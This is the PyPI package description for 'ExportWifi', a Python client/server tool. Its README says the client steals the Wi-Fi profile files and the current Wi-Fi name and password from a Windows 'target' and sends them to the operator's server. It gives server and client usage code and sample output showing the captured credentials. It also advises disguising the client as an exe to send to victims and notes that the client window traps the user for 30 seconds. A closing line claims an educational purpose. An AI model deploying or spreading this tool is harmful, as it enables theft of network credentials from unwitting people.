Metadata-Version: 2.1
Name: ExportWifi
Version: 0.0.2
Summary: Exporting WI-FI Files
Home-page: UNKNOWN
Author: Fawaz Bashiru
Author-email: fawazbashiru@gmail.com
License: MIT
Keywords: export_wifi
Platform: UNKNOWN
Classifier: Development Status :: 6 - Mature
Classifier: Intended Audience :: Education
Classifier: Operating System :: Microsoft :: Windows :: Windows 10
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Description-Content-Type: text/markdown

ExportWifi
==========

Created by: Fawaz Bashiru

This a module which imports WI-FI files and detects the current WI-FI name and the current WI-FI password of the target.
Every imported file is going to be saved in the directory where your server is located.

To install ExportWifi simply type:

`pip install ExportWifi`

In your Terminal

HOW DOES ExportWifi WORK?
========================

The ip address and the port number should be the same so the connection will work 

For example:
===========
-----------

Server
------
```python
import ExportWifi as wifi

server = wifi.WlanServer("127.0.0.1", 1234)
server.start()
```

Client
-----
````python
import ExportWifi as wifi

client = wifi.WlanClient("127.0.0.1", 1234)
client.start()
#The User can't stop tkinter for 30 seconds and is forced to fill everything 
````

All the Wi-Fi Files will be saved to your directory where the server is located

Output of Server
------
````python
"""
Waiting for connection....
Connection with ('127.0.0.1', 53343)

Connection has been established
6 Wifi files have been saved to your directory
The current WI-FI and Password of the target is 

WI-FI: ********* The Wi-Fi of the target will be here 
Password: ******* The password of the target will be here

"""
````

Additional
==========
* You can send "client.py" as an exe file to the target with "auto-py-to-exe"

* ExportWifi is very easy to use.

* The server can be used for any OS. The target can only have a Windows OS

* DO NOT USE THIS TO ATTACK SOMEONE FOREIGN. I BUILD IT FOR EDUCATIONAL PURPOSES.


Change Log
==========

0.0.1 (1/10/2022)
-----------------
- First Release

0.0.2 (19/10/2022)
------------------
- Bug Fixes
- New Features
- Printing Pdf Wi-Fi document
- Better looking terminal


